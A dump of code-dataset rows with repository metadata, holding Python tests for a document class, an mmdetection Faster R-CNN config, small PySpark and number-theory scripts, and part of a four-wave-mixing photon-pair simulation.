assert a.modality == e
assert MessageToDict(a.tags) == c
assert a.weight == w
def test_granularity_get_set():
d = Document()
d.granularity = 1
assert d.granularity == 1
def test_uri_get_set():
a = Document()
a.uri = 'https://abc.com/a.jpg'
assert a.uri == 'https://abc.com/a.jpg'
assert a.mime_type == 'image/jpeg'
with pytest.raises(ValueError):
a.uri = 'abcdefg'
def test_set_get_mime():
a = Document()
a.mime_type = 'jpg'
assert a.mime_type == 'image/jpeg'
b = Document()
b.mime_type = 'jpeg'
assert b.mime_type == 'image/jpeg'
c = Document()
c.mime_type = '.jpg'
assert c.mime_type == 'image/jpeg'
def test_no_copy_construct():
a = DocumentProto()
b = Document(a, copy=False)
a.id = '1' * 16
assert b.id == '1' * 16
b.id = '2' * 16
assert a.id == '2' * 16
def test_copy_construct():
a = DocumentProto()
b = Document(a, copy=True)
a.id = '1' * 16
assert b.id != '1' * 16
b.id = '2' * 16
assert a.id == '1' * 16
def test_bad_good_doc_id():
b = Document()
with pytest.raises(BadDocID):
b.id = 'hello'
b.id = 'abcd' * 4
b.id = 'de09' * 4
b.id = 'af54' * 4
b.id = 'abcdef0123456789'
def test_id_context():
with Document() as d:
assert not d.id
d.buffer = b'123'
assert d.id
def test_doc_content():
d = Document()
assert d.content is None
d.text = 'abc'
assert d.content == 'abc'
c = np.random.random([10, 10])
d.blob = c
np.testing.assert_equal(d.content, c)
d.buffer = b'123'
assert d.buffer == b'123'
def test_request_docs_mutable_iterator():
"""To test the weak reference work in docs"""
r = Request()
r.request_type = 'index'
for d in random_docs(10):
r.docs.append(d)
for idx, d in enumerate(r.docs):
assert isinstance(d, Document)
d.text = f'look I changed it! {idx}'
# iterate it again should see the change
doc_pointers = []
for idx, d in enumerate(r.docs):
assert isinstance(d, Document)
assert d.text == f'look I changed it! {idx}'
doc_pointers.append(d)
# pb-lize it should see the change
rpb = r.as_pb_object
for idx, d in enumerate(rpb.index.docs):
assert isinstance(d, DocumentProto)
assert d.text == f'look I changed it! {idx}'
# change again by following the pointers
for d in doc_pointers:
d.text = 'now i change it back'
# iterate it again should see the change
for idx, d in enumerate(rpb.index.docs):
assert isinstance(d, DocumentProto)
assert d.text == 'now i change it back'
def test_request_docs_chunks_mutable_iterator():
"""Test if weak reference work in nested docs"""
r = Request()
r.request_type = 'index'
for d in random_docs(10):
r.docs.append(d)
for d in r.docs:
assert isinstance(d, Document)
for idx, c in enumerate(d.chunks):
assert isinstance(d, Document)
c.text = f'look I changed it! {idx}'
# iterate it again should see the change
doc_pointers = []
for d in r.docs:
assert isinstance(d, Document)
for idx, c in enumerate(d.chunks):
assert c.text == f'look I changed it! {idx}'
doc_pointers.append(c)
# pb-lize it should see the change
rpb = r.as_pb_object
for d in rpb.index.docs:
assert isinstance(d, DocumentProto)
for idx, c in enumerate(d.chunks):
assert isinstance(c, DocumentProto)
assert c.text == f'look I changed it! {idx}'
# change again by following the pointers
for d in doc_pointers:
d.text = 'now i change it back'
# iterate it again should see the change
for d in rpb.index.docs:
assert isinstance(d, DocumentProto)
for c in d.chunks:
assert c.text == 'now i change it back'
| [
"[email protected]"
] | |
2355da4fe0a15ebbd2427a4c7f7b891e2e2ad149 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/contrib/cv/pose_estimation/Hourglass_for_PyTorch/mmpose-master/demo/mmdetection_cfg/faster_rcnn_r50_fpn_1x_coco.py | 4fb90266f00299d6ac45e49f928e81c2c3eb7535 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 6,403 | py | # -*- coding: utf-8 -*-
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
# dict(type='TensorboardLoggerHook')
])
# yapf:enable
dist_params = dict(backend='nccl')
log_level = 'INFO'
load_from = None
resume_from = None
workflow = [('train', 1)]
# optimizer
optimizer = dict(type='SGD', lr=0.02, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=None)
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=0.001,
step=[8, 11])
total_epochs = 12
model = dict(
type='FasterRCNN',
pretrained='torchvision://resnet50',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_cfg=dict(type='BN', requires_grad=True),
norm_eval=True,
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
rpn_head=dict(
type='RPNHead',
in_channels=256,
feat_channels=256,
anchor_generator=dict(
type='AnchorGenerator',
scales=[8],
ratios=[0.5, 1.0, 2.0],
strides=[4, 8, 16, 32, 64]),
bbox_coder=dict(
type='DeltaXYWHBBoxCoder',
target_means=[.0, .0, .0, .0],
target_stds=[1.0, 1.0, 1.0, 1.0]),
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='L1Loss', loss_weight=1.0)),
roi_head=dict(
type='StandardRoIHead',
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', output_size=7, sampling_ratio=0),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=dict(
type='Shared2FCBBoxHead',
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=80,
bbox_coder=dict(
type='DeltaXYWHBBoxCoder',
target_means=[0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2]),
reg_class_agnostic=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='L1Loss', loss_weight=1.0))))
# model training and testing settings
train_cfg = dict(
rpn=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
match_low_quality=True,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
allowed_border=-1,
pos_weight=-1,
debug=False),
rpn_proposal=dict(
nms_across_levels=False,
nms_pre=2000,
nms_post=1000,
max_num=1000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
match_low_quality=False,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False))
test_cfg = dict(
rpn=dict(
nms_across_levels=False,
nms_pre=1000,
nms_post=1000,
max_num=1000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
score_thr=0.05,
nms=dict(type='nms', iou_threshold=0.5),
max_per_img=100)
# soft-nms is also supported for rcnn testing
# e.g., nms=dict(type='soft_nms', iou_threshold=0.5, min_score=0.05)
)
dataset_type = 'CocoDataset'
data_root = 'data/coco/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='Resize', img_scale=(1333, 800), keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
samples_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train2017.json',
img_prefix=data_root + 'train2017/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline))
evaluation = dict(interval=1, metric='bbox')
| [
"[email protected]"
] | |
dabffd515b7dd2a0abf3bf15380ace94082f2145 | ed2a234be16e5ac95496cd959b531542a087faf6 | /Functions Advanced - Exercise/10. Keyword Arguments Length.py | 1b03e732297da99ed3703c06b09f393e7c4587db | [] | no_license | Spas52/Python_Advanced | efc73eda5d10707f1f1a7407cc697448a985f014 | 7082c8947abba9b348f8372f68d0fc10ffa57fc1 | refs/heads/main | 2023-06-04T13:05:46.394482 | 2021-06-24T00:01:37 | 2021-06-24T00:01:37 | 379,756,494 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 52 | py | def kwargs_length(**kwargs):
return len(kwargs) | [
"[email protected]"
] | |
5aebaeac9d49f1e3296ab91ff35786d10b6a5bc9 | 82e1c98b20f0544b4d8b121f9802c691892afdfc | /WWW.CSE.MSU.EDU/CONTROL/PolygonalNumber.py | 7efdb71bc5ac4a38956e4d78a095dc4f69aa146c | [] | no_license | bang103/MY-PYTHON-PROGRAMS | 14d7876bd9a232285e971b42479251537e472e59 | e407a39ffa35d1ce87bc1846807bf446717c4b24 | refs/heads/master | 2021-01-17T13:32:42.097396 | 2016-07-11T14:34:29 | 2016-07-11T14:34:29 | 40,480,057 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,107 | py | #August 12, 2015
#http://www.cse.msu.edu/~cse231/PracticeOfComputingUsingPython/
from __future__ import print_function
import math
print("On input of a perfect square, Output the two triangles that make up the square.")
while True:
inp=raw_input("Input Q/q to Quit OR Input a perfect square ---> ")
try:
fnumber=float(inp)
except:
if inp.lower()=="q":
print("Bye and Thank you")
break
else:
print("Invalid input: input contains non-numeric characters")
continue
inp2=str(fnumber)
index=inp2.find(".")
dec=inp2[index+1:]
if int(dec)==0: #a positive integer has been input
sqnumber=int(fnumber)
root=int(math.sqrt(fnumber))
n=root
t1=int((n*n+n)/2)
t2=int(((n-1)*(n-1)+(n-1))/2)
print ("The Square Number %d is made up of Two Triangular numbers %d and %d"% (sqnumber,t1,t2))
else:
print("Invalid input: only perfectly square positive integers accepted")
continue
| [
"[email protected]"
] | |
4dbb490667e510006a9631a51f82564848df9b9f | 18c699d61a7ead0c8d29efdddacd71468c227221 | /pyspark-distinct-to-drop-duplicates.py | 154bc0ea92950a02fb50fc46c18ec406f57704fb | [] | no_license | devs-93/Saprk-Common-Operation | 7847f009dca3466cd5a793bb81f1468e7ef6698b | b9ed874dcc8d059622bc63ef942925b1198c906d | refs/heads/main | 2023-08-28T09:39:15.355336 | 2021-11-12T10:19:21 | 2021-11-12T10:19:21 | 427,312,696 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,152 | py | import pyspark
from pyspark.sql import SparkSession
from pyspark.sql.functions import expr
spark = SparkSession.builder.appName('SparkByExamples.com').getOrCreate()
data = [("James1", "Sales1", 3000),
("James1", "Sales1", 3000),
("Michael", "Sales", 4600),
("Robert", "Sales", 4100),
("Maria", "Finance", 3000),
("James", "Sales", 3000),
("Scott", "Finance", 3300),
("Jen", "Finance", 3900),
("Jeff", "Marketing", 3000),
("Kumar", "Marketing", 2000),
("Saif", "Sales", 4100)
]
columns = ["employee_name", "department", "salary"]
df = spark.createDataFrame(data=data, schema=columns)
df.printSchema()
df.show(truncate=False)
# Distinct
distinctDF = df.distinct()
print("Distinct count: " + str(distinctDF.count()))
distinctDF.show(truncate=False)
# Drop duplicates
df2 = df.dropDuplicates()
print("Distinct count: " + str(df2.count()))
df2.show(truncate=False)
# Drop duplicates on selected columns
dropDisDF = df.dropDuplicates(["department", "salary"])
print("Distinct count of department salary : " + str(dropDisDF.count()))
dropDisDF.show(truncate=False)
| [
"[email protected]"
] | |
52793a05086193090d0b2d2851abe1075600a7d7 | 649417ac89aa4917eeecf00ad7aa2d9ddaa15bf6 | /PhaseMatchingBiphotonFWM.py | b4c39e2c3123be323950df49fef38a7e65ef84ab | [] | no_license | damienbonneau/sources | 70bb514e384571f922b044306f6dfd81ac459bed | 60d0aa605bbd6f9e6ea30e4a369d12dd4ed1a83b | refs/heads/master | 2021-01-20T21:15:45.454573 | 2016-08-04T18:01:49 | 2016-08-04T18:01:49 | 64,950,261 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 54,609 | py | # -*- coding: utf-8 -*-
from numpy import *
import matplotlib as mpl
from matplotlib import cm,colors
import matplotlib.pyplot as plt
from matplotlib.ticker import MaxNLocator
from scipy.optimize import leastsq
import os,time
# -----------------------------------------------------------------------------#
# Plot functions
# -----------------------------------------------------------------------------#
# Lattice: bidimensional numpy array, example : lattice = ones((size, size), dtype=float )
# extent: axis extent for each axis [begin_x,end_x,begin_y,end_y]
def plotcolormap(lattice,extent,fname = None):
fig = plt.figure()
map1=colors.LinearSegmentedColormap.from_list('bla',['#000000','#FF0000','#FFFF00'])
begin_x,end_x,begin_y,end_y = extent
aspect = (end_x - begin_x )/(end_y - begin_y)
plt.imshow(lattice, map1,vmin = 0, interpolation='nearest',extent=extent,aspect = aspect)
plt.gca().xaxis.set_major_locator( MaxNLocator(nbins = 7, prune = 'lower') )
plt.gca().yaxis.set_major_locator( MaxNLocator(nbins = 6) )
#cbar = plt.colorbar()
#cbar.locator = MaxNLocator( nbins = 6)
# vmin=0,vmax = 1,
if fname is None:
plt.show()
else:
plt.savefig(fname)
plt.close()
def plot(plots):
for x,y,style in plots:
plt.plot(x, y, style) # x, y, 'k--',
plt.grid(True)
plt.title('')
plt.xlabel('')
plt.ylabel('')
plt.show()
def plotcolormapphase(lattice,extent):
fig = plt.figure()
map1=colors.LinearSegmentedColormap.from_list('bla',['#0000FF','#000000','#FF0000'])
plt.imshow(lattice, map1,vmin = -pi,vmax = pi, interpolation='nearest',extent=extent)
# vmin=0,vmax = 1,
plt.show()
# -----------------------------------------------------------------------------#
# MISC FUNCTIONS (helpers for classes)
# -----------------------------------------------------------------------------#
def funcpeak(lbda,lbda0):
T = 1.*10**(-9)
signu = 0.441/T
siglbda = signu/(c*10**6)*(lbda0)**2
return sqrt(1./(sqrt(2*pi)*siglbda) * exp(-(lbda-lbda0)**2/(2*siglbda**2)))
"""
input state as a 2D matrix
!! the input state is not given as a density matrix
it's a pure state given in a matrix
"""
def schmidtnumber(state):
N,M = state.shape
ror=zeros((N,N)) # reduced density matrix
for l in xrange(N):
for n in xrange(N):
for p in xrange(N):
ror[l,n]+=state[p,l]*state[p,n]
ror2 = dot(ror,ror)
# compute the trace of ror2
tmp = 0
for k in xrange(N):
tmp+= ror2[k,k]
schn = 1.0/tmp
return schn
def parse_extent(line):
l1 = line.split(":")[1]
l2 = l1.split(",")[0]
swlmin,swlmax = l2.split("-")
wlmin,wlmax = float(swlmin),float(swlmax)
return wlmin,wlmax
def parse_biphoton_data(line):
l1 = line.replace("\n","")
ls = l1.split(" ")
res = []
for e in ls:
res.append(float(e))
return array(res)
# -----------------------------------------------------------------------------#
# CONSTANTS
# -----------------------------------------------------------------------------#
I = 1.0j
HPLANCK = 6.626068*10**(-34) #m2 kg / s
HBAR = HPLANCK/(2*pi)
EPSILON0 = 8.85418782*10**(-12)#m-3 kg-1 s4 A2 or C.V-1.M-1
c = 299792458.0 # CLIGHT = 299792458. # m/s
n2_Si = 6.3* 10**(-18) # m2/W (Semicond. Sci. Technol. 23 (2008) 064007 (9pp))
# -----------------------------------------------------------------------------#
# CLASS Waveguide
# -----------------------------------------------------------------------------#
# Init (width, height):
# * Take the width and height of the waveguide cross section as parameters
# * Loads a file containing lbda vs neff
# * fits a dispersion curve to the data loaded
# This class has methods to obtain the effective index, the group index, and wave number when given a wavelength
#
class Waveguide(object):
def __init__(self,width,height):
self.rootname = "waveguide_data_noslab"
self.width = width
self.height = height
s = "%dx%d" % (width,height)
files = os.listdir(self.rootname)
for fname in files:
if fname.find(s) >=0:
self.__load__(fname)
self.__fit__()
# We fix the FWM effective area that we calculate using the overlap between the four fields
self.Aeff = 0.03 # um^2
def __load__(self,fname):
path = self.rootname+"\\"+fname
f = open(path)
line = f.readline()
lbdas = []
neffs = []
while(len(line))>0:
splitted = line.split("\t")
lbda,neff = splitted[0:2]
line = f.readline()
if lbda>0:
lbdas.append(float(lbda))
neffs.append(float(neff))
self.lbdas = array(lbdas)
self.neffs = array(neffs)
return
def __fit__(self):
p0 = [1,0,0,0]
plsqwl2n = leastsq(self.__residuals__, p0, args=(self.neffs, self.lbdas))
self.pwl2n = plsqwl2n[0] # wavelength to neff
#print self.p
def __func__(self,p,x):
d,c,b,a = p
return a*x**3+b*x**2+c*x+d
def __residuals__(self,p,y, x):
err = y-self.__func__(p,x)
return err
def getneff(self,lbda):
return self.__func__(self.pwl2n,lbda)
# lbda in um
def wl2kv(self,a_lbda):
return 2*pi*self.getneff(a_lbda)/(a_lbda) # the kvector z component is returned in um-1
def kv2wl(self,a_kv):
pass # not as easy ...
def plotneff(self):
x = arange(min(self.lbdas),max(self.lbdas),0.1)
plots = [(self.lbdas,self.neffs,"-"),(x,self.getneff(x),"-")]
plot(plots)
def getng(self,lbda):
lbda_step = 0.00001
lbda1 = lbda - lbda_step
lbda2 = lbda + lbda_step
neff1 = self.getneff(lbda1)
neff2 = self.getneff(lbda2)
neff = self.getneff(lbda)
ng = neff -lbda*(neff2-neff1)/(2*lbda_step)
return ng
# -----------------------------------------------------------------------------#
# CLASS FWM_Simu
# -----------------------------------------------------------------------------#
# This class calculates the joint spectral distribution obtained for a straight
# waveguide with a given set of parameters
# Init (
# * Waveguide cross section
# * Waveguide length (Meters)
# * Pump power (Watts)
# * Pump wavelength (um)
# * Pulse duration (Seconds)
# * Repetition rate (Hz)
# )
#
# computeJS: Does the simulation
#
class FWM_Simu(object):
def __init__(self,wg = Waveguide(550,220),
length = 0.03, # 0.03 ->3cm
pumppower = 0.1*10**-3,pumpwl = 1.55,pulseduration=1.*10**(-12),reprate = 40*10**6, N= 200
):
self.T = pulseduration # in seconds
self.wg = wg # waveguide crosssection (Waveguide object)
self.length = length # Propagation length in the waveguide
self.L = length
self.pumppower = pumppower # in W
#self.gamma = 3*10**2 # W^-1 m^-1 ; non linear coeff IEEE JOURNAL OF SELECTED TOPICS IN QUANTUM ELECTRONICS, VOL. 16, NO. 1, JANUARY/FEBRUARY 2010
self.lbda_p = pumpwl
#self.pumpenvelop(self.lbda_p)
self.pumpenvelop(pumpwl) # computes siglbda
self.gamma = 460. # 2*pi/(self.lbda_p*10**(-6))*n2_Si/(self.wg.Aeff*10**(-12)) #W-1 M-1
#print "Gamma", self.gamma
self.reprate = reprate # Hz
self.Epulse = self.pumppower/self.reprate #Energy per pulse in J
self.N = N
def setPumpwl(self,x):
self.lbda_p = x
def setPulseDuration(self,x):
self.T = x
self.pumpenvelop(self.lbda_p)
# Define phase matching function
def getdk(self,p1,p2,lbda_p1,lbda_p2,lbda_s,lbda_i):
kp1,kp2,ki,ks = map(self.wg.wl2kv,[lbda_p1,lbda_p2,lbda_i,lbda_s])
ga = self.gamma*10**(-6) # to put gamma in um
dk = kp1+kp2-ks-ki-ga*(p1+p2) # When putting gamma, the phase matching bandwidth changes dramatically
return dk
# **************
# Pump envelopes
# **************
def pumpenvelop(self,lbda):
return self.gaussppumpenvelop(lbda) #self.gaussppumpenvelop(lbda)
#return self.rectpumpenvelop(lbda) #self.gaussppumpenvelop(lbda)
def toplotCWGain(self,lbda_s = arange(1.5,1.6,0.0001)):
lbda_i = 1./(2/self.lbda_p-1/lbda_s)
a_dk = self.getdk(0,0,self.lbda_p,self.lbda_p,lbda_s,lbda_i) # um-1
a_phasematching = sinc(self.length*10**6/2*a_dk)
return a_phasematching**2
def gausspulsedpumpenvelop(self,lbda,dlbda = 0.4*10**(-4)):
return self.gaussppumpenvelop(lbda) *(sin(2*pi*(lbda)/dlbda))**2# From laser textbook
def rectpumpenvelop(self,lbda):
signu = 0.441/self.T # self.linewidth #0.441/sigma_t # From laser book, in Hz
sigomega = 2*pi*signu
lbda0 = self.lbda_p
siglbda = signu/(c*10**6)*(lbda0)**2
w = sqrt(2*pi)*siglbda
self.siglbda = siglbda
a = 1/sqrt(w)
lbda_min = lbda0-w/2
lbda_max = lbda0+w/2
#print "lbdas", lbda_min,lbda_max
step = w / 400
self.pumprange = arange(lbda_min,lbda_max,step)
#print "min ", lbda_min,lbda[0]
#print "max ", lbda_max,lbda[-1]
output = (lbda>=lbda_min)*(lbda<=lbda_max)*a
#if type(lbda) == type(zeros(5)):
# print min(lbda),lbda_min,lbda_max,max(lbda)," ---> ", output.sum()
return output
def gaussppumpenvelop(self,lbda):
lbda0 = self.lbda_p
k0,k = map(self.wg.wl2kv,[lbda0,lbda])
signu = 0.441/self.T # self.linewidth #0.441/sigma_t # From laser book, in Hz
sigomega = 2*pi*signu
siglbda = signu/(c*10**6)*(lbda0)**2
ng = self.wg.getng(lbda0)
sigk = siglbda/(lbda0)**2*2*pi*ng
self.siglbda = siglbda
omega0 = 2*pi*c/lbda0
omega = 2*pi*c/lbda
#return exp(-2*log(2)*((lbda0-lbda)*10**-6)**2/(siglbda**2)) # From laser textbook
return sqrt(1./(sqrt(2*pi)*siglbda) * exp(-(lbda-lbda0)**2/(2*siglbda**2))) # this gauss envelop is on lambda which is probably not very physical ...
#return sqrt(1./(sqrt(2*pi)*sigomega) * exp(-(omega-omega0)**2/(2*sigomega**2)))*sqrt(2*pi*c)/lbda
# Rectangular pulse in the temporal domain
# lbda in um
# T : pulse length [S]
def sincpumpenvelop(self,lbda):
T = self.T
om = 2*pi*c/(lbda*10**-6)
om0 = 2*pi*c/(self.lbda_p*10**(-6))
dom = om - om0
#return sinc(dom*T/2) * sqrt(T/(2*pi)) # this normalization works when integrating over omega
# *** WARNING, in python, sinc(x) = sin(pi*x)/(pi*x) which is already normalized to one ! ***
return sinc(dom*T/2) * sqrt(T*pi*c*10**6/(lbda**2)) # c in um/s, lbda in um, T in s; this normalization is for lambda
# **************
#
# **************
# This provides the range of lbdas which should be used to accurately span the pump
def updatepumprange(self):
print "Get pump range ..."
lbda_p = self.lbda_p
lbda_step= 0.00000001 # step for finding the pump range
P = 0.
targetfraction = 0.95
deltalbda = 0.5*10**(-6) # initialize deltalbda at 1pm
while (P<targetfraction):
deltalbda = 2*deltalbda
lbdas = arange(lbda_p-deltalbda,lbda_p+deltalbda,lbda_step)
#print P
P=(self.pumpenvelop(lbdas)*self.pumpenvelop(lbdas).conjugate()).sum()*lbda_step
print P
print P
N = 400
step = (lbdas[-1]-lbdas[0])/N # Step for the returned pump range
res = arange(lbdas[0],lbdas[-1],step)
#print "Size of pump lbdas" ,lbdas.size
#print self.pumpenvelop(lbda_p)
print "Pump range : (um)",lbdas[0],lbdas[-1]
self.pumprange = res
return res
def setRangeJS(self,lbda_s_min,lbda_s_max,lbda_i_min,lbda_i_max):
self.lbda_s_min = lbda_s_min
self.lbda_s_max = lbda_s_max
self.lbda_i_min = lbda_i_min
self.lbda_i_max = lbda_i_max
self.extent = [x*1000 for x in [self.lbda_i_min,self.lbda_i_max,self.lbda_s_min,self.lbda_s_max]] # um to nm
print self.extent
def setRangeScanResonance(self,lbda_s_min,lbda_s_max):
# Get the range for signal centered on the resonance
lsm,lsM = lbda_s_min,lbda_s_max
# Get the range for idler using rough energy conservation
lp = self.lbda_p
lp_min = min(self.pumprange)
lp_max = max(self.pumprange)
lim = 1./(2./lp_min - 1./lsM)
liM = 1./(2./lp_max - 1./lsm)
print "avg_pumps", (lim+lsm)/2,(liM+lsM)/2
#print "%.2f %.2f ; %.2f %.2f (pm)" % (lsm*10**6,lsM*10**6,lim*10**6,liM*10**6)
print lsm,lsM,lim,liM
self.setRangeJS(lsm,lsM,lim,liM)
def computeJS_old(self,begin=1.545,end=1.555): # begin=1.545,end=1.555,step=0.0001
#size = int((end-begin)/step)
size = self.N
step = (end-begin) / self.N
P = self.pumppower
L = self.length
lattice = ones((size, size), dtype=float )
phases = ones((size, size), dtype=float )
for i in xrange(size):
print i
lbda_i = i*step+begin
for j in xrange(size):
lbda_s = j*step+begin
a_lbda_p1 = self.pumprange
a_lbda_p2 = 1./(1/lbda_s+1/lbda_i-1/a_lbda_p1)
a_p1 = P*self.pumpenvelop(a_lbda_p1) # pump amplitude 1
a_p2 = P*self.pumpenvelop(a_lbda_p2) # pump amplitude 2
a_dk = self.getdk(a_p1,a_p2,a_lbda_p1,a_lbda_p2,lbda_s,lbda_i)
a_phasematching = 1
a_expi = 1
#a_phasematching = sinc(L/2*a_dk)
a_expi = exp(I*L/2*a_dk)
a_res = a_phasematching*a_expi*a_p1*a_p2
res = a_res.sum()*a_res.size*step
lattice[i,size-1-j]= sqrt(abs(res.real**2+res.imag**2)) #res res #
phases[i,size-1-j] = angle(res)
#N = sqrt((lattice*conjugate(lattice)).max())
#lattice = lattice/N
self.lattice = lattice
self.phases = phases
self.extent = [begin*1000,end*1000,begin*1000,end*1000]
Z = lattice.sum()# sqrt(abs(lattice*conjugate(lattice)).sum())
self.normlattice = sqrt(abs(lattice/Z))
# Override these methods to add custom filters on signal and idler arm
def filter_idler(self,lbda):
return ones(lbda.size)
def filter_signal(self,lbda):
return ones(lbda.size)
def getPurityAfterFilter(self):
Ni = self.Ni
Ns = self.Ns
# Apply custom filters:
m_filter_signal =zeros((Ni,Ns))
m_filter_idler =zeros((Ni,Ns))
for i in arange(Ni):
m_filter_signal[i,:] = self.filter_signal(self.a_lbda_s)
for j in arange(Ns):
m_filter_idler[:,j] = self.filter_idler(self.a_lbda_i)
lattice = self.normlattice*m_filter_signal*m_filter_idler
# Multiply by the appropriate missing constants
Z = lattice.sum()# sqrt(abs(lattice*conjugate(lattice)).sum())
normlattice = sqrt(abs(lattice/Z))
self.normlattice_unfiltered = self.normlattice[:,:] # Save the previous matrix
self.normlattice = normlattice # assign the new filtered matrix
purity = self.computeHeraldedPhotonPurity() # computes the purity after filtering
self.normlattice = self.normlattice_unfiltered # restore the previous matrix
return purity
def computeJS(self):
P = self.pumppower
L = self.L # Cavity length
N = self.N
lbda_s_min = self.lbda_s_min
lbda_s_max = self.lbda_s_max
lbda_i_min = self.lbda_i_min
lbda_i_max = self.lbda_i_max
step_i = (lbda_i_max-lbda_i_min)/N
step_s = (lbda_s_max-lbda_s_min)/N
a_lbda_i = arange(lbda_i_min,lbda_i_max,step_i)[0:N]
a_lbda_s = arange(lbda_s_min,lbda_s_max,step_s)[0:N]
self.a_lbda_i = a_lbda_i
self.a_lbda_s = a_lbda_s
Ni = a_lbda_i.size
Ns = a_lbda_s.size
print Ni, Ns
self.Ni = Ni
self.Ns = Ns
self.step_i = step_i
self.step_s = step_s
rangepump = self.pumprange
M = rangepump.size
dlbda_pump = (rangepump.max()-rangepump.min())/M
lattice = zeros((Ni,Ns))
a_lbda_p1 = rangepump
a_p1 = self.pumpenvelop(a_lbda_p1) # pump amplitude 1
ng = self.wg.getng(self.lbda_p)
print "Steps" ,step_i,step_s
#dbgpm = 0.
pumpmax = self.pumpenvelop(self.lbda_p)
phases = zeros((Ni,Ns))
print max(a_p1)
for j in xrange(Ns):
#rint j
lbda_s = a_lbda_s[j] # lbda_s_min+j*step_s
for i in xrange(Ni):
lbda_i = a_lbda_i[i] # lbda_i_min+i*step_i
a_lbda_p2 = 1./(1./lbda_s+1./lbda_i-1./a_lbda_p1)
a_p2 = self.pumpenvelop(a_lbda_p2) # pump amplitude 2
#print a_lbda_p2[0],a_lbda_p2[-1]," ---> ", a_p2.sum()
#print max(a_p2)
# In order to save computation time we can take a_pm = 1. for small cavities
a_dk = 1.
a_pm = 1.
#a_dk = self.getdk(P*a_p1*conjugate(a_p1),P*a_p2*conjugate(a_p2),a_lbda_p1,a_lbda_p2,lbda_s,lbda_i)
#a_pm = sinc(L/2*a_dk/pi) # the L will be added later in the global constant
a_res = a_p1*a_p2*a_pm
a_res = a_res * a_lbda_p2/a_lbda_p1
# Multiply by the dlambda;
# The pump function is i um^(-1/2), dlbda_pump is in um
a_res = a_res*dlbda_pump
res = a_res.sum() # unitless
#res = res
# Multiply by the dlambda
# Since the formula was derived for domega, we have to remember that domega = -2*pi*c/lbda**2 * dlbda
lattice[i,Ns-1-j]= abs(res.real**2+res.imag**2)* (step_i/(lbda_i**2)) * (step_s/(lbda_s**2))
#print angle(res)
phases[i,Ns-1-j] = angle(res)
# Check what should be the proper formula which keeps the joint spectral amplitude instead of joint spectral probability distribution
# Apply custom filters:
# m_filter_signal =zeros((Ni,Ns))
# m_filter_idler =zeros((Ni,Ns))
